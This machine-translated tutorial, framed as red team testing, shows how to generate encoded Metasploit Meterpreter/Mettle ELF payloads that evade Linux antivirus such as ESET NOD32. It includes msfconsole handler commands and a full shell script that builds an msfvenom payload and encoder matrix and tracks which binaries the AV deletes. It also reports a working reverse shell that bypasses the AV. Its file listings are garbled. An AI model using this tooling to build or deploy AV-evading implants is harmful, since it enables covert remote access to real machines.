Understanding Metasploit payload AV evasion on the Linux platform

2025-02-23 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

Today I will talk about how Metasploit payloads evade antivirus (AV) on the Linux platform. Many people do not know much about this, so to make it easier to follow, the editor has summarized the following. I hope you take something away from this article.

At present, I think the vendors that have done a good job with Linux antivirus are Avast, ESET and Kaspersky. The purpose of this article is not to promote a product, but to approach the question as part of a red team exercise: run test cases against a real Linux AV and learn what gets flagged and what passes.

So, to make the tests repeatable, I wrote a simple shell script generator that produces a range of encoded Linux ELF payloads. We upload them to a Linux virtual machine (Ubuntu 18.04 x86_64) with the AV installed and let it process them. Whatever survives should, in theory, both work and bypass the AV; we then run a few of the survivors to verify that they actually function.

I will focus on Linux x86 and x86_64 Meterpreter/Mettle payloads using various encoder combinations. The generator script keeps the payload and encoder choices in variables that you can change to your preferred combinations, and it produces the binaries automatically.

Place the following script in the metasploit-framework directory and make it executable. The generator script is at:

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/AV-TEST-LINUX.sh

When running the script, enter the IP address and TCP port that the Metasploit listener will listen on.

In the first test scenario, we use ESET NOD32 4.0.90 on Ubuntu 18.04 (x86_64).

Next we have the list of generated test payloads, which we copy over SCP to the remote machine running the Linux AV. In our test, we generated 47 executables.

[Directory listing of the 47 generated payloads, garbled in extraction. Recoverable names include aarch74-reverse_tcp.elf and aarch74-reverse_tcp2.elf, armle-reverse_tcp2.elf, mipsbe-reverse_tcp.elf, mipsle-reverse_tcp.elf, x86-mt-reverse_tcp2.elf, x86-sh-bind_tcp-xor.elf and x86-sh-reverse-xor.elf, plus x64 and x86 Meterpreter variants with the xor encoder. The file sizes fall into two groups: a few hundred bytes (staged stubs, e.g. 239, 295, 342 bytes) and roughly 1 MB (stageless Mettle payloads, e.g. 1046472 and 1107790 bytes).]

Once we upload them, the AV kicks in and starts deleting payloads automatically.

After the scan completes, we see that some files were left untouched. Of those, some will not work properly and some still work, which we test in the next step. 27 files were preserved.

Because our VM is running a 64-bit system, let's look at the x86_64 payloads that survived.

[Listing of the surviving x64 payloads, garbled in extraction. Recoverable entries include a 62-byte x64 exec.elf, a 198-byte x64 Meterpreter stager and a 1046631-byte stageless x64 Meterpreter payload.]

We configure our test listener (place the following script in the metasploit-framework directory and make it executable):

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LISTENER-LINUX-METTLE.sh

(and adjust it to the payload under test, i.e. change line 13 of the script accordingly)

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh

If we want to test anything other than meterpreter/reverse_tcp, we change linux/x64/meterpreter/reverse_tcp in the listener to the corresponding payload, for example the stageless variant:

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST ' > run.listener.sh

This applies to x64-mt-reverse_tcp-xor2.elf: the platform is x64 and it is a Meterpreter reverse_tcp payload, so we launch the listener accordingly. Note the difference between the two payloads above: meterpreter/reverse_tcp is staged (a small stub that fetches Mettle from the handler) and meterpreter_reverse_tcp is stageless (Mettle embedded in the binary), and the handler's PAYLOAD must match the binary you run.
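As an added example for the generator and listener steps above (this is not the article's code and not DoktorCranium's AV-TEST-LINUX.sh or LISTENER-LINUX-METTLE.sh), the following POSIX shell script shows the moving parts in one place: building the msfvenom payload x encoder matrix with file names in the article's style, deriving the matching exploit/multi/handler line (RHOST for bind_tcp, LHOST otherwise, with the staged or stageless payload name carried through unchanged), and diffing the uploaded file list against what the AV left on the VM. The LHOST/LPORT/RHOST defaults, the payload and encoder lists, the file-name scheme and the sample survivor lists are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example, not the article's scripts. Builds the msfvenom matrix, the
# matching multi/handler line, and diffs uploads against what the AV left.
# Assumptions: LHOST/LPORT/RHOST defaults, file-name scheme, tools in PATH.
set -u
export LC_ALL=C                 # stable sort/comm collation for the diff step

LHOST="${LHOST:-192.0.2.10}"    # listener address (TEST-NET-1 placeholder)
LPORT="${LPORT:-4444}"
RHOST="${RHOST:-192.0.2.20}"    # target address, needed only for bind_tcp
OUTDIR="${OUTDIR:-payloads}"

# Staged "meterpreter/reverse_tcp" is a few hundred bytes and pulls Mettle from the
# handler; stageless "meterpreter_reverse_tcp" embeds Mettle (~1 MB). Handler must match.
is_stageless() {
    case "$1" in */meterpreter_*) return 0 ;; *) return 1 ;; esac
}

# <arch>-<kind>-<type>[-<encoder><iterations>].elf, e.g. x64-mt-reverse_tcp-xor2.elf
out_name() {
    on_arch=${1#linux/}; on_arch=${on_arch%%/*}
    on_type=${1##*/};    on_type=${on_type#meterpreter_}
    on_kind=mt
    case "$1" in */shell_*|*/shell/*) on_kind=sh; on_type=${on_type#shell_} ;; esac
    if [ -n "${2:-}" ]; then
        printf '%s-%s-%s-%s%s.elf' "$on_arch" "$on_kind" "$on_type" "${2##*/}" "${3:-1}"
    else
        printf '%s-%s-%s.elf' "$on_arch" "$on_kind" "$on_type"
    fi
}

# msfvenom command line for one payload/encoder/iterations triple ("" = no encoder).
venom_cmd() {
    vc_out="$OUTDIR/$(out_name "$1" "${2:-}" "${3:-}")"
    case "$1" in
        */bind_tcp) vc_net="LPORT=$LPORT" ;;              # bind payloads take no LHOST
        *)          vc_net="LHOST=$LHOST LPORT=$LPORT" ;;
    esac
    case "$1" in
        */shell_*|*/shell/*) vc_note='# shell payload, no Mettle' ;;
        *) if is_stageless "$1"; then vc_note='# stageless: Mettle embedded, ~1 MB'
           else vc_note='# staged: small stub, Mettle sent by the handler'; fi ;;
    esac
    if [ -n "${2:-}" ]; then
        printf 'msfvenom -p %s %s -e %s -i %s -f elf -o %s  %s\n' \
            "$1" "$vc_net" "$2" "${3:-1}" "$vc_out" "$vc_note"
    else
        printf 'msfvenom -p %s %s -f elf -o %s  %s\n' "$1" "$vc_net" "$vc_out" "$vc_note"
    fi
}

# Handler line for run.listener.sh; bind_tcp needs the target's RHOST, not LHOST.
handler_cmd() {
    case "$1" in
        */bind_tcp) hc_opts="set RHOST $RHOST; set LPORT $LPORT" ;;
        *)          hc_opts="set LHOST $LHOST; set LPORT $LPORT" ;;
    esac
    printf './msfconsole -q -x "use exploit/multi/handler; set PAYLOAD %s; %s; run"\n' "$1" "$hc_opts"
}

# The matrix: each payload unencoded, then each fitting encoder at 1 and 2 iterations.
PAYLOADS="linux/x64/meterpreter/reverse_tcp linux/x64/meterpreter_reverse_tcp \
linux/x64/meterpreter/bind_tcp linux/x86/meterpreter/reverse_tcp linux/x86/shell_reverse_tcp"
encoders_for() {
    case "$1" in
        linux/x64/*) echo "x64/xor x64/xor_dynamic" ;;
        linux/x86/*) echo "x86/shikata_ga_nai x86/countdown" ;;
    esac
}
generate_all() {
    for ga_p in $PAYLOADS; do
        venom_cmd "$ga_p" "" ""
        for ga_e in $(encoders_for "$ga_p"); do
            for ga_i in 1 2; do venom_cmd "$ga_p" "$ga_e" "$ga_i"; done
        done
    done
}

# After scp, compare the uploaded names ($1) with `ls -1` on the VM ($2):
# prints the names the AV removed.
deleted_by_av() {
    dba_a=$(mktemp); dba_b=$(mktemp)
    sort "$1" >"$dba_a"; sort "$2" >"$dba_b"
    comm -23 "$dba_a" "$dba_b"
    rm -f "$dba_a" "$dba_b"
}

# Constructed sample lists (not the article's 47/27 listing) to exercise the diff.
demo_deleted() {
    dd_a=$(mktemp); dd_b=$(mktemp)
    printf '%s\n' x64-mt-reverse_tcp.elf x64-mt-reverse_tcp-xor2.elf \
        x64-mt-bind_tcp.elf x86-mt-reverse_tcp-shikata_ga_nai1.elf >"$dd_a"
    printf '%s\n' x64-mt-reverse_tcp-xor2.elf x64-mt-bind_tcp.elf >"$dd_b"
    deleted_by_av "$dd_a" "$dd_b"
    rm -f "$dd_a" "$dd_b"
}

case "${1:-}" in
    generate) mkdir -p "$OUTDIR" && generate_all | sh ;;
    listener) handler_cmd "${2:?listener <payload>}" >run.listener.sh && chmod +x run.listener.sh ;;
esac
```

Run it with no arguments and nothing is generated; `generate` pipes the matrix into sh, and `listener linux/x64/meterpreter_reverse_tcp` writes run.listener.sh for the stageless variant. After copying the output directory over with scp, save `ls -1` of the remote directory to a file and pass the local and remote lists to deleted_by_av to see exactly which binaries the AV removed.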

Then we execute the payload on the test VM with ESET NOD32 running and get a "core dumped" message :)

Let's try another x86_64 Meterpreter/Mettle payload: x64-mt-bind_tcp.elf

This time we use the linux/x64/meterpreter/bind_tcp payload and adjust the listener again. For bind_tcp the handler needs the remote IP of the target (RHOST) rather than LHOST. That is a less convenient setup, but we test it anyway, and this time it works.

However, what we want is a reverse Meterpreter/Mettle payload that bypasses ESET NOD32 and works properly!

Let's try some more custom code:

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LINUX-FORK-METTLE.sh

Upload the resulting linux-payload to the VM running NOD32 and start the listener.

Execute linux-payload and... we have successfully bypassed the AV :) with a custom reverse Mettle payload.

I mentioned earlier that you can do the same for Windows PE32. Now you know that it works the same way on Linux as on Windows, and that you can fully automate AV evasion testing with the scripts above, scp, and so on.
